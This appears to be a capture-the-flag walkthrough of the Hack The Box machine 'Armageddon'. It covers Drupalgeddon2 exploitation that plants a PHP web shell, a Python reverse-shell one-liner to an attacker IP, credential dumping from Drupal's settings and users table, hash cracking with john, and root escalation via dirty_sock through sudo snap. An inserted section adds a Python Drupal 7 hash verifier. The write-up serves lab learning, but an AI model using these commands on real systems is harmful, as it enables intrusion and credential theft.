Reconnaissance: scanning
Scan with nmap.
┌──(kali㉿kali)-[~]
└─$ nmap -T4 -P0 -sC -sV -A -p- 10.10.10.233
Starting Nmap 7.92 ( https://nmap.org )
Nmap scan report for 10.10.10.233
Host is up (0.23s latency).
Not shown: 65533 closed tcp ports (conn-refused)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.4 (protocol 2.0)
| ssh-hostkey:
|   2048 82:c6:bb:c7:02:6a:93:bb:7c:cb:dd:9c:30:93:79:34 (RSA)
|   256 3a:ca:95:30:f3:12:d7:ca:45:05:bc:c7:f1:16:bb:fc (ECDSA)
|_  256 7a:d4:b3:68:79:cf:62:8a:7d:5a:61:e7:06:0f:5f:33 (ED25519)
80/tcp open  http    Apache httpd 2.4.6 ((CentOS) PHP/5.4.16)
| http-robots.txt: 36 disallowed entries (15 shown)
| /includes/ /misc/ /modules/ /profiles/ /scripts/
| /themes/ /CHANGELOG.txt /cron.php /INSTALL.mysql.txt
| /INSTALL.pgsql.txt /INSTALL.sqlite.txt /install.php /INSTALL.txt
|_/LICENSE.txt /MAINTAINERS.txt
|_http-generator: Drupal 7 (http://drupal.org)
|_http-title: Welcome to Armageddon | Armageddon
|_http-server-header: Apache/2.4.6 (CentOS) PHP/5.4.16
droopescan also reports that the Drupal version is 7.56.
┌──(kali㉿kali)-[~/droopescan]
└─$ ./droopescan scan drupal -u http://10.10.10.233
[+] Plugins found:
    profile http://10.10.10.233/modules/profile/
    php http://10.10.10.233/modules/php/
    image http://10.10.10.233/modules/image/

[+] Themes found:
    seven http://10.10.10.233/themes/seven/
    garland http://10.10.10.233/themes/garland/

[+] Possible version(s):
    7.56

[+] Possible interesting urls found:
    Default changelog file - http://10.10.10.233/CHANGELOG.txt
Note: installing droopescan
git clone https://github.com/droope/droopescan.git
cd droopescan
pip install -r requirements.txt
On Hack The Box the machine name is often a hint, and sure enough, searching for Drupal exploits turns up a vulnerability that covers this version.
┌──(kali㉿kali)-[~]
└─$ searchsploit drupal
------------------------------------------------------------------------------------------- ---------------------------------
 Exploit Title                                                                             |  Path
------------------------------------------------------------------------------------------- ---------------------------------
Drupal < 7.58 / < 8.3.9 / < 8.4.6 / < 8.5.1 - 'Drupalgeddon2' Remote Code Execution       | php/webapps/44449.rb
Reference: CVE-2018-7600 (Drupalgeddon2)
https://www.mbsd.jp/Whitepaper/CVE-2018-7600.pdf
Gaining access
Let's run the exploit found above.
┌──(kali㉿kali)-[~]
└─$ searchsploit -m 44449
  Exploit: Drupal < 7.58 / < 8.3.9 / < 8.4.6 / < 8.5.1 - 'Drupalgeddon2' Remote Code Execution
      URL: https://www.exploit-db.com/exploits/44449
     Path: /usr/share/exploitdb/exploits/php/webapps/44449.rb
File Type: Ruby script, ASCII text
Copied to: /home/kali/44449.rb

┌──(kali㉿kali)-[~]
└─$ ruby 44449.rb http://10.10.10.233
[*] --==[::#Drupalggedon2::]==--
--------------------------------------------------------------------------------
[i] Target : http://10.10.10.233/
--------------------------------------------------------------------------------
[+] Found  : http://10.10.10.233/CHANGELOG.txt    (HTTP Response: 200)
[+] Drupal!: v7.56
--------------------------------------------------------------------------------
[*] Testing: Form   (user/password)
[+] Result : Form valid
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
[*] Testing: Clean URLs
[!] Result : Clean URLs disabled (HTTP Response: 404)
[i] Isn't an issue for Drupal v7.x
--------------------------------------------------------------------------------
[*] Testing: Code Execution   (Method: name)
[i] Payload: echo YLCIJKNM
[+] Result : YLCIJKNM
[+] Good News Everyone! Target seems to be exploitable (Code execution)! w00hooOO!
--------------------------------------------------------------------------------
[*] Testing: Existing file   (http://10.10.10.233/shell.php)
[i] Response: HTTP 404 // Size: 5
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
[*] Testing: Writing To Web Root   (./)
[i] Payload: echo PD9waHAgaWYoIGlzc2V0KCAkX1JFUVVFU1RbJ2MnXSApICkgeyBzeXN0ZW0oICRfUkVRVUVTVFsnYyddIC4gJyAyPiYxJyApOyB9 | base64 -d | tee shell.php
[+] Result : <?php if( isset( $_REQUEST['c'] ) ) { system( $_REQUEST['c'] . ' 2>&1' ); }
[+] Very Good News Everyone! Wrote to the web root! Waayheeeey!!!
--------------------------------------------------------------------------------
[i] Fake PHP shell:   curl 'http://10.10.10.233/shell.php' -d 'c=hostname'
armageddon.htb>> whoami
apache
We now have access as the "apache" user.
Note: if running the exploit produces an error like the one below, a required Ruby gem is missing; running "sudo gem install highline" resolves the dependency.
highline/import (LoadError)
The exploit's fake shell does not allow things like changing directories, so we get a proper shell with Python instead.
Run in the shell obtained above:
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.16.5",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
Listener on Kali:
┌──(kali㉿kali)-[~]
└─$ sudo nc -nvlp 4444
listening on [any] 4444 ...
connect to [10.10.16.5] from (UNKNOWN) [10.10.10.233] 43634
sh: no job control in this shell
sh-4.2$ export PS1="[\u@\t \w]\$ "
export PS1="[\u@\t \w]\$ "
[apache@01:46:36 /var/www/html]$
Privilege escalation
Drupal keeps its database connection settings in /sites/default/settings.php.
That file exposes the MySQL connection credentials. Using them, let's look at the user information stored in MySQL.
[apache@02:07:53 /var/www/html/sites/default]$ mysql -u drupaluser -pCQHEy@9M*m23gBVj -D drupal -e 'show tables;'
<-u drupaluser -pCQHEy@9M*m23gBVj -D drupal -e 'show tables;'
Tables_in_drupal
actions authmap batch block block_custom block_node_type block_role blocked_ips
cache cache_block cache_bootstrap cache_field cache_filter cache_form cache_image cache_menu cache_page cache_path
comment date_format_locale date_format_type date_formats
field_config field_config_instance field_data_body field_data_comment_body field_data_field_image field_data_field_tags
field_revision_body field_revision_comment_body field_revision_field_image field_revision_field_tags
file_managed file_usage filter filter_format flood history image_effects image_styles
menu_custom menu_links menu_router node node_access node_comment_statistics node_revision node_type
queue rdf_mapping registry registry_file role role_permission
search_dataset search_index search_node_links search_total semaphore sequences sessions
shortcut_set shortcut_set_users system taxonomy_index taxonomy_term_data taxonomy_term_hierarchy taxonomy_vocabulary
url_alias users users_roles variable watchdog
Looking at the contents of "users", we find a user called "brucetherealadmin".
[apache@02:21:11 /var/www/html/sites/default]$ mysql -u drupaluser -pCQHEy@9M*m23gBVj -D drupal -e 'select * from users;'
<-u drupaluser -pCQHEy@9M*m23gBVj -D drupal -e 'select * from users;'
uid name pass mail theme signature signature_format created access login status timezone language picture init data
0 NULL 0 0 0 0 NULL 0 NULL
1 brucetherealadmin $S$DgL2gjv6ZtxBo6CdqZEyJuBphBmrCqIV6W97.oOsUf1xAhaadURt [email protected] filtered_html 1606998756 1607077194 1607076276 1 Europe/London 0 [email protected] a:1:{s:7:"overlay";i:1;}
This user also exists as a local account on the box.
[apache@02:29:40 /home]$ ls ./brucetherealadmin
ls ./brucetherealadmin
ls: cannot open directory ./brucetherealadmin: Permission denied
[apache@02:35:55 /home]$ ls /home/bruce
ls /home/bruce
ls: cannot access /home/bruce: No such file or directory
Let's try cracking brucetherealadmin's password hash.
┌──(kali㉿kali)-[~]
└─$ john --wordlist=./rockyou.txt pwd
Created directory: /home/kali/.john
Using default input encoding: UTF-8
Loaded 1 password hash (Drupal7, $S$ [SHA512 256/256 AVX2 4x])
Cost 1 (iteration count) is 32768 for all loaded hashes
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
booboo           (?)
1g 0:00:00:00 DONE (2022-08-22 23:26) 2.127g/s 510.6p/s 510.6c/s 510.6C/s tiffany..chris
Use the "--show" option to display all of the cracked passwords reliably
Session completed.
Note: the equivalent with hashcat
sudo hashcat -m 7900 pwd ./rockyou.txt --force
The password for "brucetherealadmin" turns out to be "booboo".
Let's SSH in with these credentials.
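The $S$ hash john just loaded is Drupal 7's phpass-derived format: "$S$", one character giving log2 of the iteration count ("D" is index 15 in Drupal's alphabet, i.e. the 32768 rounds john reported), an 8-character salt, then a custom base64 of the iterated SHA-512, truncated to 55 characters. The verifier below is an added example, not code from this post or from Drupal; it reimplements that scheme in Python, following the structure of Drupal 7's includes/password.inc, to confirm a candidate password against the hash dumped from the users table above.

```python
import hashlib
import hmac

# Alphabet used by Drupal 7 / phpass (_password_itoa64()).
ITOA64 = './0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz'
HASH_LENGTH = 55            # stored hashes are truncated to this length
MIN_LOG2, MAX_LOG2 = 7, 30  # iteration-count bounds Drupal 7 accepts

def phpass_b64(data: bytes) -> str:
    """phpass-style base64: 6-bit groups, little-endian, no padding."""
    out, i, n = [], 0, len(data)
    while i < n:
        value = data[i]
        i += 1
        out.append(ITOA64[value & 0x3f])
        if i < n:
            value |= data[i] << 8
        out.append(ITOA64[(value >> 6) & 0x3f])
        if i >= n:
            break
        i += 1
        if i < n:
            value |= data[i] << 16
        out.append(ITOA64[(value >> 12) & 0x3f])
        if i >= n:
            break
        i += 1
        out.append(ITOA64[(value >> 18) & 0x3f])
    return ''.join(out)

def parse_setting(stored: str):
    """Return (log2 iteration count, salt) from the first 12 chars of a $S$ hash."""
    setting = stored[:12]
    if len(setting) != 12 or setting[0] != '$' or setting[2] != '$':
        raise ValueError('not a Drupal 7 $S$ hash')
    count_log2 = ITOA64.index(setting[3])
    if not MIN_LOG2 <= count_log2 <= MAX_LOG2:
        raise ValueError('iteration count out of range')
    return count_log2, setting[4:12]

def drupal7_hash(password: str, stored: str) -> str:
    """Recompute the hash of password using the cost and salt of stored."""
    count_log2, salt = parse_setting(stored)
    pw = password.encode('utf-8')
    h = hashlib.sha512(salt.encode('ascii') + pw).digest()
    for _ in range(1 << count_log2):   # 2**15 = 32768 rounds for cost 'D'
        h = hashlib.sha512(h + pw).digest()
    return (stored[:12] + phpass_b64(h))[:HASH_LENGTH]

def check_password(password: str, stored: str) -> bool:
    """Constant-time comparison of the recomputed hash with the stored one."""
    return hmac.compare_digest(drupal7_hash(password, stored), stored)

# Hash of brucetherealadmin as dumped from the users table above.
BRUCE_HASH = '$S$DgL2gjv6ZtxBo6CdqZEyJuBphBmrCqIV6W97.oOsUf1xAhaadURt'
```

Each check costs 32769 SHA-512 calls, which is why the cost character matters: raising it is the only knob Drupal 7 gives an administrator against offline guessing once the users table has leaked.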
This user is allowed to run the snap command with sudo.
Searching for "snap privilege escalation" and similar terms turns up an exploit called "dirty_sock".
That code is written for python3, so it cannot be used as-is on this box.
Instead, we take just the part of the code we need and use that.
[brucetherealadmin@armageddon ~]$ python --version
Python 2.7.5
[brucetherealadmin@armageddon ~]$ python -c print'"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"+ "A" * 4256 + "=="' | base64 --decode > exploit.snap
[brucetherealadmin@armageddon ~]$ ls
army.snap  exploit.snap  user.txt  xxxx_1.0_all.snap
[brucetherealadmin@armageddon ~]$ sudo /usr/bin/snap install --dangerous --devmode exploit.snap
dirty-sock 0.1 installed
[brucetherealadmin@armageddon ~]$ tail /etc/passwd
nobody:x:99:99:Nobody:/:/sbin/nologin
systemd-network:x:192:192:systemd Network Management:/:/sbin/nologin
dbus:x:81:81:System message bus:/:/sbin/nologin
polkitd:x:999:998:User for polkitd:/:/sbin/nologin
sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin
postfix:x:89:89::/var/spool/postfix:/sbin/nologin
apache:x:48:48:Apache:/usr/share/httpd:/sbin/nologin
mysql:x:27:27:MariaDB Server:/var/lib/mysql:/sbin/nologin
brucetherealadmin:x:1000:1000::/home/brucetherealadmin:/bin/bash
dirty_sock:x:1001:1001::/home/dirty_sock:/bin/bash
[brucetherealadmin@armageddon ~]$ su dirty_sock
パスワード:
[dirty_sock@armageddon brucetherealadmin]$ sudo -i
あなたはシステム管理者から通常の講習を受けたはずです。
これは通常、以下の3点に要約されます:
    #1) 他人のプライバシーを尊重すること。
    #2) タイプする前に考えること。
    #3) 大きな力には大きな責任が伴うこと。
[sudo] dirty_sock のパスワード:
[root@armageddon ~]#
We have root.
Note: I did get as far as root, but I have not yet fully worked out the privilege escalation part above for myself.
Sites I referenced
Thank you for the valuable information.